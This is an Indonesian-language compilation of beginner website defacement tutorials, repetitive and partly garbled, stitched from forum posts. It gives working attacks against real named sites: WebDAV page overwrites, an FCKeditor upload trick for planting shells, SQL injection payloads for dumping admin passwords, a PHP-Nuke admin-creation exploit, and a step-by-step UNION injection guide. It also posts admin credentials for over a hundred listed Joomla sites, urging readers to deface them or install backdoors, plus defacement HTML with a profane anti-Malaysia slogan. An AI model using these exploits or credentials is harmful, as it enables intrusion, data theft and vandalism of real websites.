Deface
Tutorial Deface Aspx Untuk Pemula
Deface FOrum buat pemula [exploit]
Belajar Deface
DEFACE OLD PHP NUKE
Tutorial Deface 4 Newbi
Tutorial Deface Untuk Pemula
1.Deface
merubah ubah isi suatu halaman web dengan kalimat , i mage atau link tertentu yang tidak
ada sangkut pautnya dengan misi web tersebut , Biasanya hacker men-deface suatu
halaman web dengan maksud supaya eksistensinya diketahui oleh khalayak ramai.
Mungkin anda pernah dengar atau pernah mengunjungi suatu web yang terkena deface
seperti :
www.bandaaceh.go.id
www.pertamina.co.id
www.transtv.co.id
www.setkab.go.id
www.pom.go.id
www.usni.ac.id
Ternyata apabila kita perhatikan target target tersebut dengan seksama , para target
mempunyai kesamaan yaitu server web tersebut berjalan di Operating System Windows
2000 dan servernya adalah IIS 5.0/6.0.
Mungkin anda beranggapan bahwa deface server server web tersebut adalah hal yang
susah dan perlu waktu yang lama untuk menyusup ke server tersebut , ternyata hal tersebut adalah mudah semudah copy dan paste , silahkan ikuti langkah langkah berikut ,
dalam hal ini penulis menggunakan contoh penggunaan web folder pada Windows 98
1. Buatlah suatu halaman web seperti dibawah ini atau terserah anda dengan
menggunakan tool/software terserah a nda seperti Frontpage , Macromedia , Note
pad dan lain lain
2. Beri nama halaman web tersebut dengan index.html / index.asp / default.html /
default.asp atau nama lain tergantung nama file halaman pertama suatu web
terbuka atau nama terserah anda apabila hanya mau menyimpan file tersebut di
suatu web
3. Buka My computer pada desktop dan lihat icon web folder
4. Klik 2 kali pada icon web folder tersebut
5. klik 2 kali pada icon add web folder
6. Isikan URL target di popup yang muncul misalkan target kita adalah
www.pertamina.co.id maka isikan URL tersebut
7. klik next lalu finish
8. Klik 2 kali pada folder yang terbentuk dan anda akan melihat isi folder tersebut
dengan file file yang akan tampil pada halaman web apabila kita mengunjungi
web tersebut
9. rubah nama file pembuka web tersebut (biasanya nama file index.html atau
index.asp) dengan nama file lain seperti index_old.asp atau terserah anda ,
biasakan hal ini anda lakukan karena kita tidak bermaksud untuk merusak isi web
milik orang lain , hanya mengingatkan.
10. Copy dan paste-kan halaman web yang anda buat tadi di folder web folder yang
telah kita buat
11. Save di komputer anda.
12. Proses Deface selesai.
Untuk pembelajaran silahkan anda cari web site yang masih vurn dengan menggunakan
google searching ketikan keyword dengan kunci “allinurl:*.asp” atau apabila mau
mencari situs pemerintah ketikan keyword “web: .go.id”
Untuk para administrator web site , download-lah patch bug tersebut untuk menghindari
terjadinya deface yang sangat mudah ini dengan demikian untuk para hacking yang
hendak coba coba deface dengan cara ini dan prosesnya gagal , sudah dipastikan web site
yang hendak anda deface sudah tidak vurn lagi atau sudah di -patch.
Selamat mencoba.
Source : it.dept@satriasejati.com
-----------------------------------------------------------------------------------------------------------
Langsung Coba aja deh ...hihihiih
Langkah-langkah : Dork ->>> inurl:Fck/fcklinkgallery.aspx Atau
inurl:tabid "aspx" site:il Dan Masih Bannyak Lagi ^^
Pilih >> File ( A File On Your Site )
masukin kode ini di URL,trus jalanin
--------------------------- cut here -----------------------------------------
javascript:__doPostBack('ctlURL$cmdUpload','')
-------------------------- end here -----------------------------------------
Ntar muncul browse utk upload file,tgl di upload aja Wink
Oia,file yg bisa di upload antara lain :
*. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.3gp,
*.asf, *.asx, *.avi, *.flv, *.m4v, *.mov, *.mp4, *.mpe, *.mpeg, *.mpg, *.ram, *.rm, *.rmvb, *.wm, *.wmv, *.vob
masang shell ? coba aja ^_^
Selamat Mencoba dan Ayoo Saling share... Silahkan Di Komentari Jika masih ada yang kurang di posting ini .... Terima kasih
------------------------------------------------------------------------------------------------------
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-----------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------------------
2.Tutorial Deface Aspx Untuk Pemula
Hmm..Untuk Aspx, Mungkin Tutorial Ini masih cukup berguna....Langsung Coba aja deh ...hihihiih
Langkah-langkah : Dork ->>> inurl:Fck/fcklinkgallery.aspx Atau
inurl:tabid "aspx" site:il Dan Masih Bannyak Lagi ^^
Pilih >> File ( A File On Your Site )
masukin kode ini di URL,trus jalanin
--------------------------- cut here -----------------------------------------
javascript:__doPostBack('ctlURL$cmdUpload','')
-------------------------- end here -----------------------------------------
Ntar muncul browse utk upload file,tgl di upload aja Wink
Oia,file yg bisa di upload antara lain :
*. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.3gp,
*.asf, *.asx, *.avi, *.flv, *.m4v, *.mov, *.mp4, *.mpe, *.mpeg, *.mpg, *.ram, *.rm, *.rmvb, *.wm, *.wmv, *.vob
masang shell ? coba aja ^_^
Selamat Mencoba dan Ayoo Saling share... Silahkan Di Komentari Jika masih ada yang kurang di posting ini .... Terima kasih
------------------------------------------------------------------------------------------------------
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-----------------------------------------------------------------------------------------------------
3.Deface FOrum buat pemula [exploit]
nih tutorial asal nya aku download video deface dr temen, trus di file itu ad tutor nya, yaudah ku copast aja kesini langsung ya
Ketik di google
inurl:/forums.asp?iFor=
Pilih target…
Contoh target
http://www.portugalweb.net/forum/forums.asp?iFor=23
Hapus angka dibelakang =
Hingga menjadi ini
http://www.portugalweb.net/forum/forums.asp?iFor=
Ketik di google
inurl:/forums.asp?iFor=
Pilih target…
Contoh target
http://www.portugalweb.net/forum/forums.asp?iFor=23
Hapus angka dibelakang =
Hingga menjadi ini
http://www.portugalweb.net/forum/forums.asp?iFor=
Setelah = masukan SQL inject
12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users
Hingga menjadi seperti ini
http://www.portugalweb.net/forum/forums … from+users
Tulisan yg berderet di bawah nama 10 TOPICS itu adalah username
Tulisan yg berderet di bawah nama DATED itu adalah passwordnya
Cari username admin & passnya.
Ok..pada web target yg jadi bahan tutor ini saya menemukan username & password
Username : admin
Password : default
Sekarang klik tulisan login yg berada diatas.
Nah..login udah berhasil
Sekarang jika ingin melakukan defacing, klik tulisan “POST NEW TOPICS”
Isi Subject nya…
Contoh : HACKED BY BLA BLA BLA
lalu masukin script deface HTML nya ke kolom di bawah subject.
Hmm……
Jika ingin menutup full seluruh halaman, pake code berikut
<DIV align=center><DIV id=Layer1 style=”BORDER-RIGHT: #000000 1px; BORDER-TOP: #000000 1px; Z-INDEX: 1; LEFT: 0px; BORDER-LEFT: white 1px; WIDTH: 1300px; BORDER-BOTTOM: white 1px; POSITION: absolute; TOP: 0px; HEIGHT: 7000px; BACKGROUND-COLOR: white; layer-background-color: white”><center>
<br><b><font face=”papyrus” color=”red” size=”5″>Attacked by : Ichito-Bandito</font></h2><br><br><img src=”http://forum.hackers-center.org/styles/melankolia/theme/images/site_logo.jpg” ><br><br>
<font face=”papyrus” color=”red” size=”5″>FUCK Malaysial and ASSOCIATE</a><br><br>
<font face=”papyrus” color=”red” size=”5″>We Are Ready to Cybernetic Wars</font><br><br><font color=”red” size=”3″>Hackers-center In Here
</DIV>
kalo mau di tambah lagu juga bisa:
: <embed src=”[color=#0000FF]Url Lagu” autoplay=”true” hidden=”true”></embed>[/color]
Jangan lupa di edit dulu kata² nya !!!
Trus klik tombol post….
Ok…HTML deface an lo udah masuk…sekarang klik judul postingan yg lo tulis di subject tadi.
12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users
Hingga menjadi seperti ini
http://www.portugalweb.net/forum/forums … from+users
Tulisan yg berderet di bawah nama 10 TOPICS itu adalah username
Tulisan yg berderet di bawah nama DATED itu adalah passwordnya
Cari username admin & passnya.
Ok..pada web target yg jadi bahan tutor ini saya menemukan username & password
Username : admin
Password : default
Sekarang klik tulisan login yg berada diatas.
Nah..login udah berhasil
Sekarang jika ingin melakukan defacing, klik tulisan “POST NEW TOPICS”
Isi Subject nya…
Contoh : HACKED BY BLA BLA BLA
lalu masukin script deface HTML nya ke kolom di bawah subject.
Hmm……
Jika ingin menutup full seluruh halaman, pake code berikut
<DIV align=center><DIV id=Layer1 style=”BORDER-RIGHT: #000000 1px; BORDER-TOP: #000000 1px; Z-INDEX: 1; LEFT: 0px; BORDER-LEFT: white 1px; WIDTH: 1300px; BORDER-BOTTOM: white 1px; POSITION: absolute; TOP: 0px; HEIGHT: 7000px; BACKGROUND-COLOR: white; layer-background-color: white”><center>
<br><b><font face=”papyrus” color=”red” size=”5″>Attacked by : Ichito-Bandito</font></h2><br><br><img src=”http://forum.hackers-center.org/styles/melankolia/theme/images/site_logo.jpg” ><br><br>
<font face=”papyrus” color=”red” size=”5″>FUCK Malaysial and ASSOCIATE</a><br><br>
<font face=”papyrus” color=”red” size=”5″>We Are Ready to Cybernetic Wars</font><br><br><font color=”red” size=”3″>Hackers-center In Here
</DIV>
kalo mau di tambah lagu juga bisa:
: <embed src=”[color=#0000FF]Url Lagu” autoplay=”true” hidden=”true”></embed>[/color]
Jangan lupa di edit dulu kata² nya !!!
Trus klik tombol post….
Ok…HTML deface an lo udah masuk…sekarang klik judul postingan yg lo tulis di subject tadi.
source : http://forum.hackers-center.org/viewtopic.php?f=3&t=3255
*****************************************************************
mari ciptakan cyber yg bersih dari dosa, jgn bobol bank dan ngambil hak orang lain yah ! ^^
^^ http://www.jamsh0ut.com - never attack ddos cos blogger ^^
^^ http://www.anti-malingsial.com - Anti Malaysia Forever ^^
Referensi :
http://jatimcrew.org/forum/viewtopic.php?f=35&t=1343
***************************************************************
2.kemudian msukkan google dork kya gene |=> allinurl:.com/nuke/index.php atau allinurl:.org/nuke/index.php
3.nah klw udh ktemutargetnya lnjut ne. contoh: www.sakaw.com/nuke/index.php
4. gnti index.php dengan admin.php
5.jika sudah masukkan bug berikut ne dibelakang situs td:
?op=AddAuthor&add_aid=jundue32&add_name=
God&add_pwd=cobacoba&add_email=
bukanmaviamalam@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox
misal : www.junduegila.com/nuke/admin.php?op=AddAuthor&add_aid=jundue32&add_name=
God&add_pwd=cobacoba&add_email=
bukanmaviamalam@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox
6.kemudian akan muncul www.junduegila.com/nuke/admin.php?op=mod_author pada adress bar
7. kemudian kalian akan di suruh login, masukin id & password kalian tadi.
Masih ingat kan ?
id=jundue32 => liat yg diatas tadi
password=cobacoba => liat yg diatas tadi
Nah lu skrg udah masuk ke “Administration Menu” situs tsb.
so, kalian dah masuk ke situs tersebut.. tp klw tdk bsa berarti tu situs dah di path ma adminnya…
nah kalo sudah sampe sini saatnya merubah public halaman nya gan
masukin shell agan di preff.situs aja . ,,
selamat mencoba gan ,
ini gan hasilnya : http://www.svgolfinstructor.com/nuke/index.php
http://www.svgolfinstructor.com/nuke/admin.php
http://www.svgolfinstructor.com/nuke/admin.php?op=AddAuthor&add_aid=jundue32&add_name=
God&add_pwd=cobacoba&add_email=
bukanmaviamalam@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox
back to http://www.svgolfinstructor.com/nuke/admin.php
jangan lupa ctrl - ( berulang2 hingga ada tampilan login ) kecil emang , hehe
login
user : jundue32
pass: cobacoba
cari press situs, icon kolom 2 baris 3 .
ubah shell yang paling atas,,
selamat mencoba
referensi :
http://pekanbarucyberteam.forumotion.com/deface-website-nuke-php-n34.htm
***********************************************************
Langsung Coba aja deh ...hihihiih
Langkah-langkah : Dork ->>> inurl:Fck/fcklinkgallery.aspx Atau
inurl:tabid "aspx" site:il Dan Masih Bannyak Lagi ^^
Pilih >> File ( A File On Your Site )
masukin kode ini di URL,trus jalanin
--------------------------- cut here -----------------------------------------
javascript:__doPostBack('ctlURL$cmdUpload','')
-------------------------- end here -----------------------------------------
Ntar muncul browse utk upload file,tgl di upload aja Wink
Oia,file yg bisa di upload antara lain :
*. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.3gp,
*.asf, *.asx, *.avi, *.flv, *.m4v, *.mov, *.mp4, *.mpe, *.mpeg, *.mpg, *.ram, *.rm, *.rmvb, *.wm, *.wmv, *.vob
masang shell ? coba aja ^_^
Selamat Mencoba
referensi:
http://pekanbarucyberteam.forumotion.com/tutorial-f11/tutorial-deface-aspx-untuk-pemula-t30.htm#528
************************************************************************
Langsung Aja ...
Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x
===========
[+]step Satu:=
===========
carilah target
misal: [site]/berita.php?id=100
Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh: [site]/berita.php?id=100' atau
[site]/berita.php?id=-100
sehingga muncul pesan error seperti berikut ( Masih Banyak Lagi ) :
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1"
==========
[+]step Dua:=
==========
mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by
contoh: [site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*
ceklah secara step by step (satupersatu)...
misal: [site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--
sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--
berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--
===========
[+]step Tiga:=
===========
untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--
ok seumpama yg keluar angka 5
gunakan perintah version() atau @@version untuk mengecek
versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--
lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..
untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..
============
[+]step Empat:=
============
untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--
seumpama table yang muncul adalah "admin"
===========
[+]step Lima:=
===========
untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--
=============
[+] step Enam: =
=============
perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0xhexa--
pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :
www.ascii-convert.co.cc
contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0x61646D696E--
============
=step Tujuh:=
============
memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara
perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--
contoh kata yang keluar adalah id,username,password
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--
Nah, nanti akan ada beberapa password yang sudah di encrypt. jadi butuh decrtypt dulu ini membuka encrypt password nya
Decrypt password Disini : http://www.hashchecker.de/
==============
[+] step Delapan:=
==============
tahap terakhir mencari halam admin atau login
Link : http://th3-0utl4ws.com/tools/admin-finder/index.php
Nah Demikian Tutorial Yang Bisa Saya Share, Semoga Bisa Bermanfaat dan Bisa Menjadi Dasar Dari Seorang Defacer :)
Referensi:
http://prorebell.blogspot.com/2010/09/tutorial-deface-untuk-pemula.html
*****************************************************************
4.Belajar Deface
Khusus bagi newbie yang mau belajar deface atau acak-acak situs, saya hanya memberikan kesempatan kepada newbie yang mau deface situs tapi masih bingung caranya 
bukan berarti saya ini MASTER 
, mungkin kalau tutorialnya sudah banyak sekali.
situs di bawah ini adalah SITUS JOOMLA.
-------------------------------------------------------------------------------------------------------------------------
DI HARAP KEPADA MASTER-2 AGAR TIDAK DEFACE SITUS DI BAWAH INI, BERIKAN KESEMPATAN KEPADA NEWBIE YANG INGIN BELAJAR DEFACE ATAU ACAK-ACAK SITUS ORANG, TAPI KALAU MAU PASANG BACKDOOR GPP
-------------------------------------------------------------------------------------------------------------------------
Username : admin
Password : ofangi3
untuk loginnya : tambahkan url : /administrator di belakang situsnya,
contoh : situs http://aishwaryaforever.info
maka loginnya : http://aishwaryaforever.info/administrator
NB : Username dan Password sama semua untuk semua situs di bawah ini
setelah masuk cari " template manager " trus cari " site template " , trus cari template yg default, selannjutnya masukkan HTML deface kamu.
langsung aja nih saya kasih contoh situs yg sudah saya deface :
http://www.onsolo.com
HTMLnya bebas terserah kreasi kamu, kalau mau ambil HTML situs yg saya deface itu, tinggal CTRL U aza
dan ini nama-2 situs yang siap kalian EKSEKUSI , acak-2 aza sepuas kamu sampai PUAS
======================================================================================
1. http://aishwaryaforever.info/
2. http://banen.styleanddesign.nl/
3. http://bollywoodcity.nl/
4. http://bollywoodmovie.nl/
5. http://bollywoodonline.nl/
6. http://bollywoodprijsvraag.com/
7. http://bollywoodselected.com/
8. http://bollywoodtags.com/
9. http://bollywoodtones.nl/
10. http://bollywoodvideoclip.com/
11. http://debtloan4u.com/
12. http://diensten.iguru.nl/
13. http://dutchstart.nl/
14. http://flashwebdesign.styleanddesign.nl/
15. http://forum.indianflava.nl/
16. http://forum.sangam.nl/
17. http://geldzaken.iguru.nl/
18. http://hanoman.biz/
19. http://hindoeplaza.nl/
20. http://hinduwijzer.nl/
21. http://hosting.styleanddesign.nl/
22. http://iguru.nl/
23. http://indianfeelings.be/
24. http://indianflava.nl/
25. http://indianlifestyle.nl/
26. http://indiastart.nl/
27. http://joomla15webdesign.nl/
28. http://joomlastart.com/
29. http://liefde.iguru.nl/
30. http://luckytones.nl/
31. http://messpeeps.com/
32. http://meteenafvallen.nl/
33. http://neshmedia.nl/
34. http://nieuws.iguru.nl/
35. http://radioguru.nl/
36. http://reizen.iguru.nl/
37. http://sangam.nl/
38. http://sharukhkhan.info/
39. http://startler.net/
40. http://styleanddesign.nl/
41. http://surinamestart.nl/
42. http://thenewsoffice.com/
43. http://webwinkel.styleanddesign.nl/
44. http://www.aishwaryaforever.info/
45. http://www.bollywoodcity.nl/
46. http://www.bollywoodmovie.nl/
47. http://www.bollywoodonline.nl/
48. http://www.bollywoodprijsvraag.com/
49. http://www.bollywoodselected.com/
50. http://www.bollywoodtags.com/
51. http://www.bollywoodtones.nl/
52. http://www.bollywoodvideoclip.com/
53. http://www.debtloan4u.com/
54. http://www.dutchstart.nl/
55. http://www.eprofessionals.nl/
56. http://www.hanoman.biz/
57. http://www.hindoemandir.nl/
58. http://www.hindoeplaza.nl/
59. http://www.hinduwijzer.nl/
60. http://www.iguru.be/
61. http://www.iguru.nl/
62. http://www.indianfeelings.be/
63. http://www.indianflava.nl/
64. http://www.indianlifestyle.nl/
65. http://www.indiastart.nl/
66. http://www.joomla15webdesign.nl/
67. http://www.joomlastart.com/
68. http://www.luckytones.nl/
69. http://www.mandirzoetermeer.nl/
70. http://www.messpeeps.com/
71. http://www.meteenafvallen.nl/
72. http://www.neshmedia.nl/
73. http://www.radioguru.nl/
74. http://www.sangam.nl/
75. http://www.sharukhkhan.info/
76. http://www.startler.net/
77. http://www.styleanddesign.nl/
78. http://www.surinamestart.nl/
79. http://www.thenewsoffice.com/
# http://akshaykumar.info/
# http://bedrijvengids.indianfeelings.com/
# http://bollywood.indianfeelings.com/
# http://bollywooddance.nl/
# http://bollywoodnieuws.indianfeelings.nl/
# http://bollywoodwinkel.nl/
# http://careerforce.nl/
# http://coolplanet.nl/
# http://dutchdirectory.nl/
# http://forum.indianfeelings.com/
# http://forum.indianfeelings.nl/
# http://fotoalbum.indianfeelings.com/
# http://fotoalbum.indianfeelings.nl/
# http://games.coolplanet.nl/
# http://guruwebdesign.nl/
# http://hindoegids.nl/
# http://hindu.indianfeelings.com/
# http://hollywoodselected.com/
# http://indianfeelings.com/
# http://indianfeelings.nl/
# http://info.indianfeelings.com/
# http://info.indianfeelings.nl/
# http://leenguru.nl/
# http://lenen.nieuwsguru.nl/
# http://liefde.loveguru.nl/
# http://loungelaville.nl/
# http://loveguru.nl/
# http://nieuwsguru.nl/
# http://onsolo.com/
# http://receptendagboek.nl/
# http://sanjaydutt.info/
# http://surinamepunt.nl/
# http://travel.indianfeelings.com/
# http://travel.indianfeelings.nl/
# http://trulywoman.nl/
# http://visitmenow.com/
# http://vrouwenaanzet.indianfeelings.nl/
# http://wiki.indianfeelings.nl/
# http://www.akshaykumar.info/
# http://www.bollywooddance.nl/
# http://www.bollywoodwinkel.nl/
# http://www.careerforce.nl/
# http://www.coolplanet.nl/
# http://www.dutchdirectory.nl/
# http://www.guruwebdesign.nl/
# http://www.hindoegids.nl/
# http://www.hollywoodselected.com/
# http://www.indianfeelings.com/
# http://www.indianfeelings.nl/
# http://www.leenguru.nl/
# http://www.loungelaville.nl/
# http://www.loveguru.nl/
# http://www.nieuwsguru.nl/
# http://www.onsolo.com/
# http://www.receptendagboek.nl/
# http://www.sanjaydutt.info/
# http://www.surinamepunt.nl/
# http://www.trulywoman.nl/
# http://www.visitmenow.com/
# http://www.lolavisagie.nl
# http://www.ifoundyou.nl/
# http://www.stagehunter.nl
===========================================================
bukan berarti saya ini MASTER , mungkin kalau tutorialnya sudah banyak sekali.situs di bawah ini adalah SITUS JOOMLA.
-------------------------------------------------------------------------------------------------------------------------
DI HARAP KEPADA MASTER-2 AGAR TIDAK DEFACE SITUS DI BAWAH INI, BERIKAN KESEMPATAN KEPADA NEWBIE YANG INGIN BELAJAR DEFACE ATAU ACAK-ACAK SITUS ORANG, TAPI KALAU MAU PASANG BACKDOOR GPP
-------------------------------------------------------------------------------------------------------------------------
Username : admin
Password : ofangi3
untuk loginnya : tambahkan url : /administrator di belakang situsnya,
contoh : situs http://aishwaryaforever.info
maka loginnya : http://aishwaryaforever.info/administrator
NB : Username dan Password sama semua untuk semua situs di bawah ini
setelah masuk cari " template manager " trus cari " site template " , trus cari template yg default, selannjutnya masukkan HTML deface kamu.
langsung aja nih saya kasih contoh situs yg sudah saya deface :
http://www.onsolo.com
HTMLnya bebas terserah kreasi kamu, kalau mau ambil HTML situs yg saya deface itu, tinggal CTRL U aza
dan ini nama-2 situs yang siap kalian EKSEKUSI , acak-2 aza sepuas kamu sampai PUAS
======================================================================================
1. http://aishwaryaforever.info/
2. http://banen.styleanddesign.nl/
3. http://bollywoodcity.nl/
4. http://bollywoodmovie.nl/
5. http://bollywoodonline.nl/
6. http://bollywoodprijsvraag.com/
7. http://bollywoodselected.com/
8. http://bollywoodtags.com/
9. http://bollywoodtones.nl/
10. http://bollywoodvideoclip.com/
11. http://debtloan4u.com/
12. http://diensten.iguru.nl/
13. http://dutchstart.nl/
14. http://flashwebdesign.styleanddesign.nl/
15. http://forum.indianflava.nl/
16. http://forum.sangam.nl/
17. http://geldzaken.iguru.nl/
18. http://hanoman.biz/
19. http://hindoeplaza.nl/
20. http://hinduwijzer.nl/
21. http://hosting.styleanddesign.nl/
22. http://iguru.nl/
23. http://indianfeelings.be/
24. http://indianflava.nl/
25. http://indianlifestyle.nl/
26. http://indiastart.nl/
27. http://joomla15webdesign.nl/
28. http://joomlastart.com/
29. http://liefde.iguru.nl/
30. http://luckytones.nl/
31. http://messpeeps.com/
32. http://meteenafvallen.nl/
33. http://neshmedia.nl/
34. http://nieuws.iguru.nl/
35. http://radioguru.nl/
36. http://reizen.iguru.nl/
37. http://sangam.nl/
38. http://sharukhkhan.info/
39. http://startler.net/
40. http://styleanddesign.nl/
41. http://surinamestart.nl/
42. http://thenewsoffice.com/
43. http://webwinkel.styleanddesign.nl/
44. http://www.aishwaryaforever.info/
45. http://www.bollywoodcity.nl/
46. http://www.bollywoodmovie.nl/
47. http://www.bollywoodonline.nl/
48. http://www.bollywoodprijsvraag.com/
49. http://www.bollywoodselected.com/
50. http://www.bollywoodtags.com/
51. http://www.bollywoodtones.nl/
52. http://www.bollywoodvideoclip.com/
53. http://www.debtloan4u.com/
54. http://www.dutchstart.nl/
55. http://www.eprofessionals.nl/
56. http://www.hanoman.biz/
57. http://www.hindoemandir.nl/
58. http://www.hindoeplaza.nl/
59. http://www.hinduwijzer.nl/
60. http://www.iguru.be/
61. http://www.iguru.nl/
62. http://www.indianfeelings.be/
63. http://www.indianflava.nl/
64. http://www.indianlifestyle.nl/
65. http://www.indiastart.nl/
66. http://www.joomla15webdesign.nl/
67. http://www.joomlastart.com/
68. http://www.luckytones.nl/
69. http://www.mandirzoetermeer.nl/
70. http://www.messpeeps.com/
71. http://www.meteenafvallen.nl/
72. http://www.neshmedia.nl/
73. http://www.radioguru.nl/
74. http://www.sangam.nl/
75. http://www.sharukhkhan.info/
76. http://www.startler.net/
77. http://www.styleanddesign.nl/
78. http://www.surinamestart.nl/
79. http://www.thenewsoffice.com/
# http://akshaykumar.info/
# http://bedrijvengids.indianfeelings.com/
# http://bollywood.indianfeelings.com/
# http://bollywooddance.nl/
# http://bollywoodnieuws.indianfeelings.nl/
# http://bollywoodwinkel.nl/
# http://careerforce.nl/
# http://coolplanet.nl/
# http://dutchdirectory.nl/
# http://forum.indianfeelings.com/
# http://forum.indianfeelings.nl/
# http://fotoalbum.indianfeelings.com/
# http://fotoalbum.indianfeelings.nl/
# http://games.coolplanet.nl/
# http://guruwebdesign.nl/
# http://hindoegids.nl/
# http://hindu.indianfeelings.com/
# http://hollywoodselected.com/
# http://indianfeelings.com/
# http://indianfeelings.nl/
# http://info.indianfeelings.com/
# http://info.indianfeelings.nl/
# http://leenguru.nl/
# http://lenen.nieuwsguru.nl/
# http://liefde.loveguru.nl/
# http://loungelaville.nl/
# http://loveguru.nl/
# http://nieuwsguru.nl/
# http://onsolo.com/
# http://receptendagboek.nl/
# http://sanjaydutt.info/
# http://surinamepunt.nl/
# http://travel.indianfeelings.com/
# http://travel.indianfeelings.nl/
# http://trulywoman.nl/
# http://visitmenow.com/
# http://vrouwenaanzet.indianfeelings.nl/
# http://wiki.indianfeelings.nl/
# http://www.akshaykumar.info/
# http://www.bollywooddance.nl/
# http://www.bollywoodwinkel.nl/
# http://www.careerforce.nl/
# http://www.coolplanet.nl/
# http://www.dutchdirectory.nl/
# http://www.guruwebdesign.nl/
# http://www.hindoegids.nl/
# http://www.hollywoodselected.com/
# http://www.indianfeelings.com/
# http://www.indianfeelings.nl/
# http://www.leenguru.nl/
# http://www.loungelaville.nl/
# http://www.loveguru.nl/
# http://www.nieuwsguru.nl/
# http://www.onsolo.com/
# http://www.receptendagboek.nl/
# http://www.sanjaydutt.info/
# http://www.surinamepunt.nl/
# http://www.trulywoman.nl/
# http://www.visitmenow.com/
# http://www.lolavisagie.nl
# http://www.ifoundyou.nl/
# http://www.stagehunter.nl
===========================================================
mari ciptakan cyber yg bersih dari dosa, jgn bobol bank dan ngambil hak orang lain yah ! ^^
^^ http://www.jamsh0ut.com - never attack ddos cos blogger ^^
^^ http://www.anti-malingsial.com - Anti Malaysia Forever ^^
Referensi :
http://jatimcrew.org/forum/viewtopic.php?f=35&t=1343
***************************************************************
5.DEFACE OLD PHP NUKE
1.Buka situs www.google.com2.kemudian msukkan google dork kya gene |=> allinurl:.com/nuke/index.php atau allinurl:.org/nuke/index.php
3.nah klw udh ktemutargetnya lnjut ne. contoh: www.sakaw.com/nuke/index.php
4. gnti index.php dengan admin.php
5.jika sudah masukkan bug berikut ne dibelakang situs td:
?op=AddAuthor&add_aid=jundue32&add_name=
God&add_pwd=cobacoba&add_email=
bukanmaviamalam@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox
misal : www.junduegila.com/nuke/admin.php?op=AddAuthor&add_aid=jundue32&add_name=
God&add_pwd=cobacoba&add_email=
bukanmaviamalam@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox
6.kemudian akan muncul www.junduegila.com/nuke/admin.php?op=mod_author pada adress bar
7. kemudian kalian akan di suruh login, masukin id & password kalian tadi.
Masih ingat kan ?
id=jundue32 => liat yg diatas tadi
password=cobacoba => liat yg diatas tadi
Nah lu skrg udah masuk ke “Administration Menu” situs tsb.
so, kalian dah masuk ke situs tersebut.. tp klw tdk bsa berarti tu situs dah di path ma adminnya…
